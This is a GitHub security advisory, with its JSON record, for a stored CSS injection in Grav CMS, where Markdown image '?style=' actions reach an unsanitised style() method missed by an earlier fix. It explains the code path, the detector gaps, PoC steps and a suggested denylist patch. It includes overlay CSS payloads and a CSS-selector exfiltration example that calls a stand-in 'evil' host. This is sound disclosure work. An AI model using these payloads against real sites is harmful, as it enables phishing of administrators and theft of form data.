GHSA-PMF8-G7C8-7V54
Vulnerability from github – Published: 2026-06-18 14:49 – Updated: 2026-06-18 14:49Summary
The fix for GHSA-r7fx-8g49-7hhr / CVE-2026-42841 (Stored XSS via Markdown media attribute() action) is incomplete. The maintainer patched MediaObjectTrait::attribute() to deny dangerous attribute names (event handlers, style, xmlns, srcdoc, formaction) but the sibling MediaObjectTrait::style() method is reachable through the same Markdown excerpt-action pipeline and writes editor-controlled strings straight into the rendered <img style="…"> attribute with no sanitization.
Any user with admin.pages permission (e.g. an editor) can save Markdown like:

which renders to a stored-CSS payload that any higher-privileged viewer (administrator, super-admin, reviewer) loads in their authenticated session. Same trust boundary, same victim, same attacker, same Markdown input vector as the patched GHSA-r7fx-8g49-7hhr issue — the fix simply patched the attribute() entry point and missed the style() sibling.
Affected versions
Vulnerable at HEAD across every currently-shipping branch (verified 2026-06-15):
| Branch / tag | MediaObjectTrait::style() |
|---|---|
develop (f4c0f42) |
unpatched |
2.0 (96e1d2d) |
unpatched |
2.0.0-rc.8 (latest 2.0 RC tag) |
unpatched |
1.7.52 (latest 1.7 stable) |
unpatched |
Per SECURITY.md, this advisory targets the 2.0 line (publisher-level exploit, not eligible for 1.7 backport per the project's stated policy).
Trust boundary
Per the project's SECURITY.md:
A vulnerability is when an actor can escape the trust scope of their role: a publisher whose stored content compromises an admin session, an unauthenticated visitor who reaches a privileged sink, an account at any tier that gains capabilities it was not granted.
An editor authoring Markdown is operating within their role. A higher-privilege admin loading that editor's page in their authenticated session and getting attacker-controlled CSS painted into their browser is across the trust boundary — the same framing that was accepted for GHSA-r7fx-8g49-7hhr (MODERATE) and GHSA-c2q3-p4jr-c55f (MODERATE).
Details
Original GHSA-r7fx-8g49-7hhr fix (commit 5a12f9be8, 2026-04-23)
public function attribute($attribute = null, $value = '')
{
if (empty($attribute) || !is_string($attribute)) {
return $this;
}
if (!self::isSafeAttributeName($attribute)) {
return $this;
}
$this->attributes[$attribute] = $value;
return $this;
}
private static function isSafeAttributeName(string $name): bool
{
if (!preg_match('/^[A-Za-z][A-Za-z0-9_:.\-]*$/', $name)) {
return false;
}
$lower = strtolower($name);
if (str_starts_with($lower, 'on')) { // event handlers
return false;
}
$denylist = ['style', 'xmlns', 'srcdoc', 'formaction'];
return !in_array($lower, $denylist, true);
}
style is the second-named entry on the denylist — the maintainer explicitly recognised that editor-supplied style was dangerous when arriving via the attribute() action. The fix simply didn't reach the parallel sink.
The unpatched sibling: MediaObjectTrait::style() (line 519)
/**
* Allows to add an inline style attribute from Markdown or Twig
* Example: 
*/
public function style($style)
{
$this->styleAttributes[] = rtrim($style, ';') . ';';
return $this;
}
The function is unchanged before, during, and after the GHSA-r7fx-8g49-7hhr fix. The PHPDoc on the very next line names the Markdown invocation form (?style=…). The rtrim is for clean concatenation, not security.
$styleAttributes is concatenated and assigned to attributes['style'] in parsedownElement() (lines 242–251):
$style = '';
foreach ($this->styleAttributes as $key => $value) {
if (is_numeric($key)) { // editor-supplied entries are numeric-keyed
$style .= $value;
} else {
$style .= $key . ': ' . $value . ';';
}
}
if ($style) {
$attributes['style'] = $style;
}
Parsedown then runs htmlspecialchars on the value (so quote-breakout into a new attribute is blocked), but arbitrary CSS as the value is enough.
Source → sink trace
The Markdown processor wires query-string keys to method calls on the Medium object (system/src/Grav/Common/Page/Markdown/Excerpts.php:262):
foreach ($actions as $action) {
$matches = [];
if (preg_match('/\[(.*)\]/', (string) $action['params'], $matches)) {
$args = [explode(',', $matches[1])];
} else {
$args = explode(',', (string) $action['params']);
}
$medium = call_user_func_array([$medium, $action['method']], $args);
}
?style=position:fixed;top:0;left:0 becomes $medium->style('position:fixed;top:0;left:0').
Save-side XSS detector misses the payload
AdminController::savePage() runs Security::detectXssFromArray() on data[content] before persisting (classes/plugin/AdminController.php:1402). All five default patterns miss the Markdown form:
on_events: requires<…on*=in source.invalid_protocols: requiresjavascript:/data:/etc. — the phishing-overlay payload uses none.moz_binding: requires-moz-binding:literally.html_inline_styles: requires<…style=…(url:|x:expression); Markdown source has no<and nourl:.dangerous_tags: requires<svg/<script/etc.
Save proceeds, the payload persists, the CSS is rendered to every viewer.
Impact
- Phishing overlay — full-viewport
position:fixedcovering the admin UI with attacker-controlled background/content; admin clicks intended actions into the attacker's overlay. - UI redress / clickjacking — invisible overlays hijacking admin button clicks.
- CSS-selector data exfiltration —
input[value^="a"] { background: url(//evil/log?c=a) }against form fields the higher-privileged viewer interacts with. - Persistent admin-UI denial-of-service —
position:fixed; background:whitecovers the page until the offending content is removed by hand on the server.
The stored payload reaches every user who views the editor's page — including administrators previewing pending changes.
Proof of concept
A deterministic end-to-end PoC against a real Grav install ships with the finding (repro.sh). Steps:
- Log in as an editor (
admin.pages+admin.pages.update, noadmin.super). - Upload a benign image to a target page.
- Save the page with the Markdown payload
. - Visit the public page; observe the
<img style="…">carrying the unsanitised CSS.
Suggested fix
Apply the same denylist + identifier-shape gate to style() that isSafeAttributeName() enforces for attribute():
public function style($style)
{
+ if (!is_string($style) || !self::isSafeStyleValue($style)) {
+ return $this;
+ }
$this->styleAttributes[] = rtrim($style, ';') . ';';
return $this;
}
+/**
+ * Editor-controlled style values arrive via Markdown `?style=…` and reach
+ * the rendered `<img style="…">` attribute verbatim. Limit to a conservative
+ * set of CSS that themes legitimately use from content (sizing, float,
+ * margin, etc.) and reject anything that opens a phishing-overlay or
+ * data-exfil primitive. Matches the spirit of the attribute() denylist
+ * from GHSA-r7fx-8g49-7hhr — same trust boundary, sibling sink.
+ */
+private static function isSafeStyleValue(string $css): bool
+{
+ $css = strtolower($css);
+ // Deny: phishing-overlay positioning, CSS-selector exfil sinks
+ // (background/content url(...)), expression() (legacy IE),
+ // -moz-binding (legacy FF), behavior: url() (IE).
+ $deny = ['position:', '@import', 'url(', 'expression(',
+ '-moz-binding', 'behavior:', 'z-index:', 'fixed', 'absolute'];
+ foreach ($deny as $needle) {
+ if (str_contains($css, $needle)) {
+ return false;
+ }
+ }
+ return (bool) preg_match('/^[A-Za-z0-9 :;%.,\-#\/]*$/', $css);
+}
Alternatively, deprecate the Markdown ?style=… action entirely — themes can still set inline styles from PHP, but accepting attacker-controlled CSS from page content was always a footgun.
Defense in depth: extend Security::detectXss()'s html_inline_styles rule to also match Markdown-form ?style= query parameters in data[content] on save.
References
- Original advisory: GHSA-r7fx-8g49-7hhr
- Fix commit:
5a12f9be8(system/src/Grav/Common/Media/Traits/MediaObjectTrait.php) - Unpatched code:
system/src/Grav/Common/Media/Traits/MediaObjectTrait.phplines 519–524 - Project security policy:
SECURITY.md(trust-boundary severity model)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.0.0-rc.8"
},
"package": {
"ecosystem": "Packagist",
"name": "getgrav/grav"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.0-rc.9"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-55890"
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T14:49:19Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "## Summary\n\nThe fix for **GHSA-r7fx-8g49-7hhr / CVE-2026-42841** (Stored XSS via Markdown media `attribute()` action) is incomplete. The maintainer patched `MediaObjectTrait::attribute()` to deny dangerous attribute names (event handlers, `style`, `xmlns`, `srcdoc`, `formaction`) but the sibling `MediaObjectTrait::style()` method is reachable through the **same Markdown excerpt-action pipeline** and writes editor-controlled strings straight into the rendered `\u003cimg style=\"\u2026\"\u003e` attribute with **no sanitization**.\n\nAny user with `admin.pages` permission (e.g. an editor) can save Markdown like:\n\n```markdown\n\n```\n\nwhich renders to a stored-CSS payload that any higher-privileged viewer (administrator, super-admin, reviewer) loads in their authenticated session. Same trust boundary, same victim, same attacker, same Markdown input vector as the patched GHSA-r7fx-8g49-7hhr issue \u2014 the fix simply patched the `attribute()` entry point and missed the `style()` sibling.\n\n## Affected versions\n\nVulnerable at HEAD across every currently-shipping branch (verified 2026-06-15):\n\n| Branch / tag | `MediaObjectTrait::style()` |\n|---|---|\n| `develop` (`f4c0f42`) | unpatched |\n| `2.0` (`96e1d2d`) | unpatched |\n| `2.0.0-rc.8` (latest 2.0 RC tag) | unpatched |\n| `1.7.52` (latest 1.7 stable) | unpatched |\n\nPer `SECURITY.md`, this advisory targets the **2.0 line** (publisher-level exploit, not eligible for 1.7 backport per the project\u0027s stated policy).\n\n## Trust boundary\n\nPer the project\u0027s `SECURITY.md`:\n\n\u003e A vulnerability is when an actor can **escape the trust scope of their role**: a publisher whose stored content compromises an admin session, an unauthenticated visitor who reaches a privileged sink, an account at any tier that gains capabilities it was not granted.\n\nAn editor authoring Markdown is operating within their role. A higher-privilege admin loading that editor\u0027s page in their authenticated session and getting attacker-controlled CSS painted into their browser is **across the trust boundary** \u2014 the same framing that was accepted for GHSA-r7fx-8g49-7hhr (MODERATE) and GHSA-c2q3-p4jr-c55f (MODERATE).\n\n## Details\n\n### Original GHSA-r7fx-8g49-7hhr fix (commit `5a12f9be8`, 2026-04-23)\n\n```php\npublic function attribute($attribute = null, $value = \u0027\u0027)\n{\n if (empty($attribute) || !is_string($attribute)) {\n return $this;\n }\n if (!self::isSafeAttributeName($attribute)) {\n return $this;\n }\n $this-\u003eattributes[$attribute] = $value;\n return $this;\n}\n\nprivate static function isSafeAttributeName(string $name): bool\n{\n if (!preg_match(\u0027/^[A-Za-z][A-Za-z0-9_:.\\-]*$/\u0027, $name)) {\n return false;\n }\n $lower = strtolower($name);\n if (str_starts_with($lower, \u0027on\u0027)) { // event handlers\n return false;\n }\n $denylist = [\u0027style\u0027, \u0027xmlns\u0027, \u0027srcdoc\u0027, \u0027formaction\u0027];\n return !in_array($lower, $denylist, true);\n}\n```\n\n`style` is the **second-named entry** on the denylist \u2014 the maintainer explicitly recognised that editor-supplied `style` was dangerous when arriving via the `attribute()` action. The fix simply didn\u0027t reach the parallel sink.\n\n### The unpatched sibling: `MediaObjectTrait::style()` (line 519)\n\n```php\n/**\n * Allows to add an inline style attribute from Markdown or Twig\n * Example: \n */\npublic function style($style)\n{\n $this-\u003estyleAttributes[] = rtrim($style, \u0027;\u0027) . \u0027;\u0027;\n return $this;\n}\n```\n\nThe function is unchanged before, during, and after the GHSA-r7fx-8g49-7hhr fix. The PHPDoc on the very next line names the Markdown invocation form (`?style=\u2026`). The `rtrim` is for clean concatenation, not security.\n\n`$styleAttributes` is concatenated and assigned to `attributes[\u0027style\u0027]` in `parsedownElement()` (lines 242\u2013251):\n\n```php\n$style = \u0027\u0027;\nforeach ($this-\u003estyleAttributes as $key =\u003e $value) {\n if (is_numeric($key)) { // editor-supplied entries are numeric-keyed\n $style .= $value;\n } else {\n $style .= $key . \u0027: \u0027 . $value . \u0027;\u0027;\n }\n}\nif ($style) {\n $attributes[\u0027style\u0027] = $style;\n}\n```\n\nParsedown then runs `htmlspecialchars` on the value (so quote-breakout into a new attribute is blocked), but arbitrary CSS as the value is enough.\n\n### Source \u2192 sink trace\n\nThe Markdown processor wires query-string keys to method calls on the `Medium` object (`system/src/Grav/Common/Page/Markdown/Excerpts.php:262`):\n\n```php\nforeach ($actions as $action) {\n $matches = [];\n if (preg_match(\u0027/\\[(.*)\\]/\u0027, (string) $action[\u0027params\u0027], $matches)) {\n $args = [explode(\u0027,\u0027, $matches[1])];\n } else {\n $args = explode(\u0027,\u0027, (string) $action[\u0027params\u0027]);\n }\n $medium = call_user_func_array([$medium, $action[\u0027method\u0027]], $args);\n}\n```\n\n`?style=position:fixed;top:0;left:0` becomes `$medium-\u003estyle(\u0027position:fixed;top:0;left:0\u0027)`.\n\n### Save-side XSS detector misses the payload\n\n`AdminController::savePage()` runs `Security::detectXssFromArray()` on `data[content]` before persisting (`classes/plugin/AdminController.php:1402`). All five default patterns miss the Markdown form:\n\n- `on_events`: requires `\u003c\u2026on*=` in source.\n- `invalid_protocols`: requires `javascript:`/`data:`/etc. \u2014 the phishing-overlay payload uses none.\n- `moz_binding`: requires `-moz-binding:` literally.\n- `html_inline_styles`: requires `\u003c\u2026style=\u2026(url:|x:expression)`; Markdown source has no `\u003c` and no `url:`.\n- `dangerous_tags`: requires `\u003csvg`/`\u003cscript`/etc.\n\nSave proceeds, the payload persists, the CSS is rendered to every viewer.\n\n## Impact\n\n- **Phishing overlay** \u2014 full-viewport `position:fixed` covering the admin UI with attacker-controlled background/content; admin clicks intended actions into the attacker\u0027s overlay.\n- **UI redress / clickjacking** \u2014 invisible overlays hijacking admin button clicks.\n- **CSS-selector data exfiltration** \u2014 `input[value^=\"a\"] { background: url(//evil/log?c=a) }` against form fields the higher-privileged viewer interacts with.\n- **Persistent admin-UI denial-of-service** \u2014 `position:fixed; background:white` covers the page until the offending content is removed by hand on the server.\n\nThe stored payload reaches every user who views the editor\u0027s page \u2014 including administrators previewing pending changes.\n\n## Proof of concept\n\nA deterministic end-to-end PoC against a real Grav install ships with the finding (`repro.sh`). Steps:\n\n1. Log in as an editor (`admin.pages` + `admin.pages.update`, no `admin.super`).\n2. Upload a benign image to a target page.\n3. Save the page with the Markdown payload ``.\n4. Visit the public page; observe the `\u003cimg style=\"\u2026\"\u003e` carrying the unsanitised CSS.\n\n## Suggested fix\n\nApply the same denylist + identifier-shape gate to `style()` that `isSafeAttributeName()` enforces for `attribute()`:\n\n```diff\n public function style($style)\n {\n+ if (!is_string($style) || !self::isSafeStyleValue($style)) {\n+ return $this;\n+ }\n $this-\u003estyleAttributes[] = rtrim($style, \u0027;\u0027) . \u0027;\u0027;\n return $this;\n }\n\n+/**\n+ * Editor-controlled style values arrive via Markdown `?style=\u2026` and reach\n+ * the rendered `\u003cimg style=\"\u2026\"\u003e` attribute verbatim. Limit to a conservative\n+ * set of CSS that themes legitimately use from content (sizing, float,\n+ * margin, etc.) and reject anything that opens a phishing-overlay or\n+ * data-exfil primitive. Matches the spirit of the attribute() denylist\n+ * from GHSA-r7fx-8g49-7hhr \u2014 same trust boundary, sibling sink.\n+ */\n+private static function isSafeStyleValue(string $css): bool\n+{\n+ $css = strtolower($css);\n+ // Deny: phishing-overlay positioning, CSS-selector exfil sinks\n+ // (background/content url(...)), expression() (legacy IE),\n+ // -moz-binding (legacy FF), behavior: url() (IE).\n+ $deny = [\u0027position:\u0027, \u0027@import\u0027, \u0027url(\u0027, \u0027expression(\u0027,\n+ \u0027-moz-binding\u0027, \u0027behavior:\u0027, \u0027z-index:\u0027, \u0027fixed\u0027, \u0027absolute\u0027];\n+ foreach ($deny as $needle) {\n+ if (str_contains($css, $needle)) {\n+ return false;\n+ }\n+ }\n+ return (bool) preg_match(\u0027/^[A-Za-z0-9 :;%.,\\-#\\/]*$/\u0027, $css);\n+}\n```\n\nAlternatively, deprecate the Markdown `?style=\u2026` action entirely \u2014 themes can still set inline styles from PHP, but accepting attacker-controlled CSS from page content was always a footgun.\n\nDefense in depth: extend `Security::detectXss()`\u0027s `html_inline_styles` rule to also match Markdown-form `?style=` query parameters in `data[content]` on save.\n\n## References\n\n- Original advisory: GHSA-r7fx-8g49-7hhr\n- Fix commit: `5a12f9be8` (`system/src/Grav/Common/Media/Traits/MediaObjectTrait.php`)\n- Unpatched code: `system/src/Grav/Common/Media/Traits/MediaObjectTrait.php` lines 519\u2013524\n- Project security policy: `SECURITY.md` (trust-boundary severity model)",
"id": "GHSA-pmf8-g7c8-7v54",
"modified": "2026-06-18T14:49:19Z",
"published": "2026-06-18T14:49:19Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/getgrav/grav/security/advisories/GHSA-pmf8-g7c8-7v54"
},
{
"type": "WEB",
"url": "https://github.com/getgrav/grav/commit/5a12f9be8"
},
{
"type": "PACKAGE",
"url": "https://github.com/getgrav/grav"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Grav: Stored CSS injection via Markdown image ?style=\u2026 reaches MediaObjectTrait::style() \u2014 incomplete patch of GHSA-r7fx-8g49-7hhr"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.